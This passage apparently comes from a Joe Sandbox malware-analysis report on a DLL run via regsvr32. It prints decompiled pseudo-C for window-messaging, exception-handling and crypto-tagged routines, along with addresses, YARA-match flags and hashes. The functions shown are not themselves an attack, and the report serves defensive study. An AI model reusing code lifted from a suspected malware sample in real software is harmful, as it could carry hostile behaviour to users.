								r12d = r12d + r15d;
								if(_t61 != 0) {
									continue;
								}
								goto L14;
							}
						}
						goto L16;
					}
				}
				E10016020(__rcx);
				asm("bt eax, 0x1c");
				if(_t50 < 0) {
					goto L3;
				}
				_t47 = r15d;
				goto L4;
			}

















                                                                              0x100111a4
                                                                              0x100111a4
                                                                              0x100111a4
                                                                              0x100111a4
                                                                              0x100111a4
                                                                              0x100111a4
                                                                              0x100111b5
                                                                              0x100111bb
                                                                              0x100111be
                                                                              0x100111c3
                                                                              0x100111c6
                                                                              0x100111c9
                                                                              0x100111db
                                                                              0x100111db
                                                                              0x100111dd
                                                                              0x100111dd
                                                                              0x100111e1
                                                                              0x100111e7
                                                                              0x100111eb
                                                                              0x100111ee
                                                                              0x100111f3
                                                                              0x00000000
                                                                              0x1001127c
                                                                              0x00000000
                                                                              0x1001127c
                                                                              0x100111fb
                                                                              0x100111fe
                                                                              0x10011203
                                                                              0x10011206
                                                                              0x10011216
                                                                              0x00000000
                                                                              0x10011284
                                                                              0x1001128f
                                                                              0x100112ab
                                                                              0x100112b4
                                                                              0x100112ba
                                                                              0x100112ba
                                                                              0x100112bc
                                                                              0x100112ca
                                                                              0x10011300
                                                                              0x00000000
                                                                              0x100112cc
                                                                              0x100112d6
                                                                              0x100112d8
                                                                              0x100112db
                                                                              0x100112db
                                                                              0x100112de
                                                                              0x100112e1
                                                                              0x100112e6
                                                                              0x100112e9
                                                                              0x100112f9
                                                                              0x00000000
                                                                              0x100112fb
                                                                              0x00000000
                                                                              0x100112fb
                                                                              0x100112f9
                                                                              0x100112ca
                                                                              0x1001130e
                                                                              0x00000000
                                                                              0x10011313
                                                                              0x1001121a
                                                                              0x10011222
                                                                              0x10011227
                                                                              0x1001122b
                                                                              0x10011231
                                                                              0x10011231
                                                                              0x10011236
                                                                              0x10011242
                                                                              0x10011246
                                                                              0x1001124e
                                                                              0x10011251
                                                                              0x10011251
                                                                              0x1001125b
                                                                              0x1001127a
                                                                              0x1001127a
                                                                              0x00000000
                                                                              0x1001125d
                                                                              0x1001125d
                                                                              0x10011261
                                                                              0x10011264
                                                                              0x1001126c
                                                                              0x10011272
                                                                              0x10011278
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10011278
                                                                              0x1001125b
                                                                              0x00000000
                                                                              0x1001127c
                                                                              0x1001127c
                                                                              0x100111cb
                                                                              0x100111d0
                                                                              0x100111d4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100111d6
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                              • String ID:
                                                                              • API String ID: 2853195852-0
                                                                              • Opcode ID: d5e18a1d606841b02109919f82e5d6fa4ee13ca92fd6fb09f7e19d6972dd7013
                                                                              • Instruction ID: b8b1c3e505a41bc058b0c50c77b00a9a21a145481cf5b28a89b261a30e844423
                                                                              • Opcode Fuzzy Hash: d5e18a1d606841b02109919f82e5d6fa4ee13ca92fd6fb09f7e19d6972dd7013
                                                                              • Instruction Fuzzy Hash: 7E31213670068182FB59CB76AC55BDB62E0FB89BD9F524020DE1A8B654EF78C8D6C600
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800165E4 Relevance: 10.4, Strings: 8, Instructions: 443COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -~$!X$"98$5%dv$RXrB$}k=$t$t
                                                                              • API String ID: 0-2601355769
                                                                              • Opcode ID: 0a8b809f1bee51353db36dd63f0d117cdcdd06e22789ff9a2a6a3000a94a6757
                                                                              • Instruction ID: 40fa059977533c12daa4c197ac7ec32be5dd4a9ad21ad0dd792eee812670dda9
                                                                              • Opcode Fuzzy Hash: 0a8b809f1bee51353db36dd63f0d117cdcdd06e22789ff9a2a6a3000a94a6757
                                                                              • Instruction Fuzzy Hash: 4E32F4B1A0578C8BCBB9CF68C8997DD7BF0FB48318F90521DEA099B251CB745A45CB18
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001DBFC Relevance: 10.0, Strings: 7, Instructions: 1221COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #X$$3$1P$H<,D$I$e$e
                                                                              • API String ID: 0-63615268
                                                                              • Opcode ID: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                                                              • Instruction ID: 84603d17c853973844c2c43058df0d3f37fc759f8199a5ada31f3ca4409f6e56
                                                                              • Opcode Fuzzy Hash: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                                                              • Instruction Fuzzy Hash: 64E2CF715046898BDBF9DF24C88A7DD3BA1BB44344FA0C119E88ECE291DF745A8DEB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100344A8 Relevance: 9.2, APIs: 6, Instructions: 182windowCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 45%
                                                                              			E100344A8(long __ebx, long __edx, void* __esi, intOrPtr* __rcx, intOrPtr* __rdx, long __r8, intOrPtr* __r9, void* __r10, void* __r11) {
				long long _v56;
				long long _v128;
				void* __rbx;
				void* __rdi;
				void* _t37;
				long _t41;
				void* _t43;
				long _t49;
				long _t51;
				long _t58;
				void* _t66;
				void* _t68;
				signed int _t73;
				intOrPtr* _t79;
				signed long long _t84;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t102;
				intOrPtr* _t103;
				long _t104;
				signed long long _t105;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t115;
				void* _t117;
				void* _t118;

				_t118 = __r11;
				_t117 = __r10;
				_t115 = __r9;
				_t114 = __r8;
				_t98 = __rdx;
				_t86 = __rcx;
				_t72 = __esi;
				_t62 = __edx;
				_t58 = __ebx;
				_t73 = r8w & 0xffffffff;
				_t105 = __edx;
				_t103 = __rcx;
				if(__edx < 0) {
					L8:
					_t59 = 0x80070057;
					E10009538(0x80070057, _t62, _t79, _t84, _t86, _t98, _t103, _t114, _t115, _t118);
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t84);
					_push(_t105);
					_push(_t103);
					_v128 = 0xfffffffe;
					_t85 = _t86;
					E10015FAC(_t79, _t86);
					_t106 = _t79;
					_t79 = _t79 == 0;
					if(_t79 == 0) {
						E10016544();
						asm("int3");
					}
					r9d = 0;
					r8d = 0;
					_t66 = 0x184;
					_t87 =  *((intOrPtr*)(_t79 + 0x40));
					_t40 = SendMessageW(??, ??, ??, ??);
					_t119 =  *((intOrPtr*)(_t85 + 0xe8));
					_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 0xe8)) + 8));
					r12d = 0xffffffff;
					__eflags = _t104;
					if(_t104 == 0) {
						L27:
						r9d = 0;
						r8d = 0;
						_t41 = SendMessageW(??, ??, ??, ??);
						__eflags = _t41;
						if(_t41 != 0) {
							__eflags = _t41 - 1;
							if(_t41 != 1) {
								r9d = 0;
								r8d = 0;
								__eflags = r8d;
								_t68 = 0x186;
								SendMessageW(??, ??, ??, ??);
							} else {
								r9d = 0;
								r8d = 0;
								SendMessageW(??, ??, ??, ??);
								 *((long long*)(_t85 + 0xf0)) = _t79;
								_t68 = 1;
								E10027920();
							}
						} else {
							_t68 = r12d;
							E10027920();
						}
						_t43 = E10027D70(_t58, _t59, _t68, _t72, _t79, _t85, _t114, _t115, _t117, _t119);
					} else {
						while(1) {
							_t79 = _t104;
							__eflags = _t104;
							if(_t104 == 0) {
								break;
							}
							_t104 =  *_t104;
							_t108 =  *((intOrPtr*)(_t79 + 0x10));
							E10029130(_t40);
							__eflags = _t79;
							_t59 = 0 | __eflags != 0x00000000;
							if(__eflags == 0) {
								_t59 = 0x80004005;
								E10009538(0x80004005, _t66, _t79, _t85, _t87, _t98, _t104, _t114, _t115, _t119);
								asm("int3");
								break;
							} else {
								 *((intOrPtr*)( *_t79 + 0x18))();
								_v56 = _t79 + 0x18;
								r8d = 2;
								_t87 = _t108;
								_t49 =  *((intOrPtr*)( *_t108 + 0xc8))();
								__eflags = _t49;
								if(_t49 == 0) {
									_t79 = _v56;
									goto L18;
								} else {
									_t79 = _v56;
									__eflags =  *(_t79 - 0x10);
									if( *(_t79 - 0x10) == 0) {
										L18:
										_t98 = _t79 - 0x18;
										asm("lock xadd [edx+0x10], eax");
										_t40 = r12d + r12d;
										__eflags = r12d + r12d;
										if(r12d + r12d <= 0) {
											_t87 =  *_t98;
											_t79 =  *((intOrPtr*)( *_t98));
											_t40 =  *((intOrPtr*)(_t79 + 8))();
										}
										__eflags = _t104;
										if(_t104 == 0) {
											goto L27;
										} else {
											continue;
										}
									} else {
										r8d = 0;
										_t51 = SendMessageW(??, ??, ??, ??);
										__eflags = _t51 - r12d;
										if(_t51 == r12d) {
											E10027920();
											_t102 = _v56 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											__eflags = r12d + r12d;
											if(r12d + r12d <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t102)) + 8))();
											}
											_t43 = 0;
										} else {
											_t114 = _t51;
											_t115 = _t108;
											_t66 = 0x19a;
											_t87 =  *((intOrPtr*)(_t106 + 0x40));
											SendMessageW(??, ??, ??, ??);
											_t79 = _v56;
											goto L18;
										}
									}
								}
							}
							goto L33;
						}
						E10016544();
						asm("int3");
						goto L27;
					}
					L33:
					return _t43;
				} else {
					_t79 =  *__rcx;
					_t84 =  *(_t79 - 0x10);
					if(__esi >= __ebx) {
						goto L8;
					} else {
						if( *((intOrPtr*)(_t79 - 8)) > 1) {
							_t62 =  *(_t79 - 0x10);
							_t37 = E1000964C( *(_t79 - 0x10), __rcx, __rdx, __r8);
						}
						_t79 =  *_t103;
						 *(_t79 + _t105 * 2) = _t73;
						if(_t58 < 0) {
							L7:
							E10009538(0x80070057, _t62, _t79, _t84, _t86, _t98, _t103, _t114, _t115, _t118);
							asm("int3");
							goto L8;
						} else {
							_t79 =  *_t103;
							if(_t58 >  *((intOrPtr*)(_t79 - 0xc))) {
								goto L7;
							} else {
								 *(_t79 - 0x10) = _t58;
								 *((short*)( *_t103 + _t84 * 2)) = 0;
								return _t37;
							}
						}
					}
				}
			}





























                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344a8
                                                                              0x100344b3
                                                                              0x100344b7
                                                                              0x100344ba
                                                                              0x100344bd
                                                                              0x1003450b
                                                                              0x1003450b
                                                                              0x10034510
                                                                              0x10034515
                                                                              0x10034516
                                                                              0x10034517
                                                                              0x10034518
                                                                              0x1003451b
                                                                              0x1003451c
                                                                              0x10034523
                                                                              0x1003452c
                                                                              0x10034534
                                                                              0x10034539
                                                                              0x10034544
                                                                              0x10034546
                                                                              0x10034548
                                                                              0x1003454d
                                                                              0x1003454d
                                                                              0x1003454e
                                                                              0x10034551
                                                                              0x10034554
                                                                              0x10034559
                                                                              0x1003455d
                                                                              0x10034563
                                                                              0x1003456a
                                                                              0x1003456e
                                                                              0x10034574
                                                                              0x10034577
                                                                              0x10034684
                                                                              0x10034684
                                                                              0x10034687
                                                                              0x10034693
                                                                              0x10034699
                                                                              0x1003469b
                                                                              0x100346aa
                                                                              0x100346ad
                                                                              0x100346da
                                                                              0x100346dd
                                                                              0x100346dd
                                                                              0x100346e0
                                                                              0x100346e9
                                                                              0x100346af
                                                                              0x100346af
                                                                              0x100346b2
                                                                              0x100346be
                                                                              0x100346c4
                                                                              0x100346cb
                                                                              0x100346d3
                                                                              0x100346d3
                                                                              0x1003469d
                                                                              0x1003469d
                                                                              0x100346a3
                                                                              0x100346a3
                                                                              0x100346f2
                                                                              0x1003457d
                                                                              0x1003457d
                                                                              0x1003457d
                                                                              0x10034580
                                                                              0x10034583
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10034589
                                                                              0x1003458c
                                                                              0x10034590
                                                                              0x10034597
                                                                              0x1003459a
                                                                              0x1003459f
                                                                              0x10034673
                                                                              0x10034678
                                                                              0x1003467d
                                                                              0x00000000
                                                                              0x100345a5
                                                                              0x100345ab
                                                                              0x100345b2
                                                                              0x100345bb
                                                                              0x100345c6
                                                                              0x100345c9
                                                                              0x100345cf
                                                                              0x100345d1
                                                                              0x10034614
                                                                              0x00000000
                                                                              0x100345d3
                                                                              0x100345d3
                                                                              0x100345d8
                                                                              0x100345dc
                                                                              0x10034619
                                                                              0x10034619
                                                                              0x10034620
                                                                              0x10034625
                                                                              0x10034628
                                                                              0x1003462a
                                                                              0x1003462c
                                                                              0x1003462f
                                                                              0x10034632
                                                                              0x10034632
                                                                              0x10034635
                                                                              0x10034638
                                                                              0x00000000
                                                                              0x1003463a
                                                                              0x00000000
                                                                              0x1003463a
                                                                              0x100345de
                                                                              0x100345e1
                                                                              0x100345ed
                                                                              0x100345f3
                                                                              0x100345f6
                                                                              0x10034645
                                                                              0x10034650
                                                                              0x10034657
                                                                              0x1003465f
                                                                              0x10034661
                                                                              0x10034669
                                                                              0x10034669
                                                                              0x1003466c
                                                                              0x100345f8
                                                                              0x100345f8
                                                                              0x100345fb
                                                                              0x100345fe
                                                                              0x10034603
                                                                              0x10034607
                                                                              0x1003460d
                                                                              0x00000000
                                                                              0x1003460d
                                                                              0x100345f6
                                                                              0x100345dc
                                                                              0x100345d1
                                                                              0x00000000
                                                                              0x1003459f
                                                                              0x1003467e
                                                                              0x10034683
                                                                              0x00000000
                                                                              0x10034683
                                                                              0x100346f7
                                                                              0x10034701
                                                                              0x100344bf
                                                                              0x100344bf
                                                                              0x100344c2
                                                                              0x100344c8
                                                                              0x00000000
                                                                              0x100344ca
                                                                              0x100344ce
                                                                              0x100344d0
                                                                              0x100344d3
                                                                              0x100344d3
                                                                              0x100344da
                                                                              0x100344dd
                                                                              0x100344e1
                                                                              0x10034500
                                                                              0x10034505
                                                                              0x1003450a
                                                                              0x00000000
                                                                              0x100344e3
                                                                              0x100344e3
                                                                              0x100344e9
                                                                              0x00000000
                                                                              0x100344eb
                                                                              0x100344eb
                                                                              0x100344f1
                                                                              0x100344ff
                                                                              0x100344ff
                                                                              0x100344e9
                                                                              0x100344e1
                                                                              0x100344c8

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: c095f5a7b1d57227eaff7237b913d88e94ec710ae420bada62304fefb7bd7605
                                                                              • Instruction ID: 240ec0fb7386d88448af4abcecd8c80fe5ddc477b37c39a7a53fc5c67f05d4de
                                                                              • Opcode Fuzzy Hash: c095f5a7b1d57227eaff7237b913d88e94ec710ae420bada62304fefb7bd7605
                                                                              • Instruction Fuzzy Hash: 3451CE7AB01A4186EB05DF26E84575D2361FB85BE6F168221DF1D4FBA4DF38E891C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001B798 Relevance: 9.1, APIs: 6, Instructions: 117windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$InvalidateLongRectWindow
                                                                              • String ID:
                                                                              • API String ID: 74886174-0
                                                                              • Opcode ID: fe76ccbfdacbdf83874c22caa6d6a2e6748571efca0061a173b28c798c0f463f
                                                                              • Instruction ID: 44e160316299951656abefa0a34bafa7abd00bb438b293af6480eb529f69bc80
                                                                              • Opcode Fuzzy Hash: fe76ccbfdacbdf83874c22caa6d6a2e6748571efca0061a173b28c798c0f463f
                                                                              • Instruction Fuzzy Hash: 0F41D132714A8082E721CB72E954BAA7761F7C9BD8F429011DF8A0BF45DF39D585C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003C790 Relevance: 9.1, APIs: 6, Instructions: 59COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 43%
                                                                              			E1003C790(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, long long _a40) {
				long long _v0;
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				char _v1272;
				long long _v1416;
				char _v1432;
				long long _v1440;
				long long _v1448;
				long long _v1464;
				void* _t22;
				void* _t23;
				void* _t24;
				int _t30;
				void* _t32;
				int _t33;
				long long* _t40;
				intOrPtr _t47;
				long long* _t64;

				_t53 = __rdx;
				_t40 = _t64;
				 *((long long*)(_t40 - 8)) = __rbx;
				 *((long long*)(_t40 - 0x10)) = __rbp;
				 *((long long*)(_t40 - 0x18)) = __rsi;
				_t47 =  *0x10075330; // 0x8ce87d7c0
				 *((long long*)(_t40 - 0x20)) = __rdi;
				_t32 = r9d;
				_t23 = E1003CDF0(_t22, _t40, _t47);
				if(_t40 == 0) {
					_t24 = E10047010(_t23);
					__imp__RtlCaptureContext();
					_t8 =  &_v1432; // 0x10000002f
					r8d = 0x98;
					E1003A240(_t24, 2, 0, _t8, _t53, __r8);
					_v1432 = 0xc000000d;
					_v1416 = _v0;
					_v1448 =  &_v1432;
					_t14 =  &_v1272; // 0x1000000cf
					_v1440 = _t14;
					_t33 = IsDebuggerPresent();
					SetUnhandledExceptionFilter(??);
					if(UnhandledExceptionFilter(??) == 0 && _t33 == 0) {
						E10047010(_t28);
					}
					GetCurrentProcess();
					_t30 = TerminateProcess(??, ??);
				} else {
					r9d = _t32;
					_v1464 = _a40;
					_t30 =  *_t40();
				}
				return _t30;
			}























                                                                              0x1003c790
                                                                              0x1003c790
                                                                              0x1003c79a
                                                                              0x1003c79e
                                                                              0x1003c7a2
                                                                              0x1003c7a9
                                                                              0x1003c7b0
                                                                              0x1003c7b4
                                                                              0x1003c7bd
                                                                              0x1003c7c5
                                                                              0x1003c7ec
                                                                              0x1003c7f9
                                                                              0x1003c7ff
                                                                              0x1003c806
                                                                              0x1003c80c
                                                                              0x1003c819
                                                                              0x1003c821
                                                                              0x1003c82b
                                                                              0x1003c830
                                                                              0x1003c838
                                                                              0x1003c845
                                                                              0x1003c847
                                                                              0x1003c85a
                                                                              0x1003c863
                                                                              0x1003c863
                                                                              0x1003c868
                                                                              0x1003c876
                                                                              0x1003c7c7
                                                                              0x1003c7cf
                                                                              0x1003c7db
                                                                              0x1003c7e0
                                                                              0x1003c7e0
                                                                              0x1003c8a3

                                                                              APIs
                                                                                • Part of subcall function 1003CDF0: FlsGetValue.KERNEL32 ref: 1003CE04
                                                                              • RtlCaptureContext.KERNEL32 ref: 1003C7F9
                                                                              • IsDebuggerPresent.KERNEL32 ref: 1003C83D
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 1003C847
                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 1003C852
                                                                              • GetCurrentProcess.KERNEL32 ref: 1003C868
                                                                              • TerminateProcess.KERNEL32 ref: 1003C876
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminateValue
                                                                              • String ID:
                                                                              • API String ID: 2638224479-0
                                                                              • Opcode ID: 03ff5d0a462a3e98c4f9e594c1346768df694e7ac341708cf3fc24f5f0b2811c
                                                                              • Instruction ID: 44e0b5adc85d2cbd5dbab0fd7a1db4757995cfaac7f09138122376ed3646b33d
                                                                              • Opcode Fuzzy Hash: 03ff5d0a462a3e98c4f9e594c1346768df694e7ac341708cf3fc24f5f0b2811c
                                                                              • Instruction Fuzzy Hash: 70215C35315F8085EB21DB52F84479EB3A4FB89B85F850426EB8E47B64DF78C544CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003C6F0 Relevance: 9.0, APIs: 6, Instructions: 34COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 38%
                                                                              			E1003C6F0(void* __ecx, void* __rdx, void* __r8) {
				long long _v0;
				char _v1240;
				long long _v1384;
				char _v1400;
				long long _v1408;
				long long _v1416;
				void* _t12;
				int _t20;

				__imp__RtlCaptureContext();
				r8d = 0x98;
				E1003A240(_t12, __ecx, 0,  &_v1400, __rdx, __r8);
				_v1400 = 0xc000000d;
				_v1384 = _v0;
				_v1416 =  &_v1400;
				_v1408 =  &_v1240;
				_t20 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(??);
				if(UnhandledExceptionFilter(??) == 0 && _t20 == 0) {
					E10047010(_t16);
				}
				GetCurrentProcess();
				return TerminateProcess(??, ??);
			}











                                                                              0x1003c701
                                                                              0x1003c70e
                                                                              0x1003c714
                                                                              0x1003c721
                                                                              0x1003c729
                                                                              0x1003c733
                                                                              0x1003c740
                                                                              0x1003c74d
                                                                              0x1003c74f
                                                                              0x1003c762
                                                                              0x1003c76b
                                                                              0x1003c76b
                                                                              0x1003c770
                                                                              0x1003c78c

                                                                              APIs
                                                                              • RtlCaptureContext.KERNEL32 ref: 1003C701
                                                                              • IsDebuggerPresent.KERNEL32 ref: 1003C745
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 1003C74F
                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 1003C75A
                                                                              • GetCurrentProcess.KERNEL32 ref: 1003C770
                                                                              • TerminateProcess.KERNEL32 ref: 1003C77E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                              • String ID:
                                                                              • API String ID: 1269745586-0
                                                                              • Opcode ID: 6d3fbee3310cca47be1f0811ecaff984c7e3a4bbe4c874a61a866926c0fbca62
                                                                              • Instruction ID: 16c498d9e47d42a2c862cdd8b7ebef11303f3f458d0ee4da1f74e43c12a7cbee
                                                                              • Opcode Fuzzy Hash: 6d3fbee3310cca47be1f0811ecaff984c7e3a4bbe4c874a61a866926c0fbca62
                                                                              • Instruction Fuzzy Hash: 9E011E31328A8586DB21DB61F8447DA73A4FBC9709F820125E6CE47A64EF7CC188CF10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004A700 Relevance: 7.8, APIs: 5, Instructions: 259COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 34%
                                                                              			E1004A700(signed int __ecx, void* __edx, long long __rbx, long long __rcx, signed char* __rdx, long long __rdi, long long __rsi, signed int __r8, intOrPtr* __r9, long long __r12, long long __r13, long long __r14, long long __r15) {
				signed int _t101;
				long _t103;
				signed int _t105;
				signed int _t106;
				signed int _t109;
				signed int _t112;
				signed int _t114;
				signed int _t117;
				signed long long _t128;
				signed long long _t129;
				signed int _t132;
				intOrPtr* _t133;
				signed int* _t142;
				long long _t144;
				signed long long _t145;
				long long* _t150;
				long long _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				long long _t157;
				signed int _t160;
				intOrPtr _t161;
				signed char* _t163;
				long long _t165;
				signed long long _t167;
				signed int _t168;
				intOrPtr* _t173;
				signed long long _t174;
				signed int _t176;
				long long _t182;
				long long _t185;
				long long _t187;
				signed long long _t188;

				_t187 = __r15;
				_t182 = __r13;
				_t173 = __r9;
				_t168 = __r8;
				_t157 = __rdi;
				_t155 = __rdx;
				_t147 = __rcx;
				_t144 = __rbx;
				_t117 = __ecx;
				_t174 = _t167;
				_t128 =  *0x1006f4c8; // 0x6f13091946cb
				_t129 = _t128 ^ _t167;
				 *(_t167 + 0x70) = _t129;
				 *((long long*)(_t174 - 0x10)) = _t165;
				 *((long long*)(_t174 - 0x18)) = __rsi;
				 *((long long*)(_t174 - 0x28)) = __r12;
				 *((long long*)(_t174 - 0x38)) = __r14;
				_t185 = __rcx;
				 *(_t167 + 0x40) = 0;
				_t176 = __r8;
				_t163 = __rdx;
				if(__rcx == 0 || __r8 != 0) {
					__eflags = _t155;
					if(_t155 != 0) {
						__eflags = _t168 - 0x7fffffff;
						if(_t168 > 0x7fffffff) {
							goto L4;
						}
						 *((long long*)(_t167 + 0xc0)) = _t144;
						 *((long long*)(_t167 + 0xa8)) = _t157;
						 *((long long*)(_t167 + 0x98)) = _t182;
						r13b = 0;
						__eflags = _t173;
						 *((long long*)(_t167 + 0x88)) = _t187;
						 *(_t167 + 0x60) = r13b;
						if(_t173 != 0) {
							_t150 = _t167 + 0x48;
							 *_t150 =  *_t173;
							_t132 =  *((intOrPtr*)(_t173 + 8));
							 *((long long*)(_t150 + 8)) = _t132;
							r13d =  *(_t167 + 0x60) & 0x000000ff;
							_t145 =  *((intOrPtr*)(_t167 + 0x58));
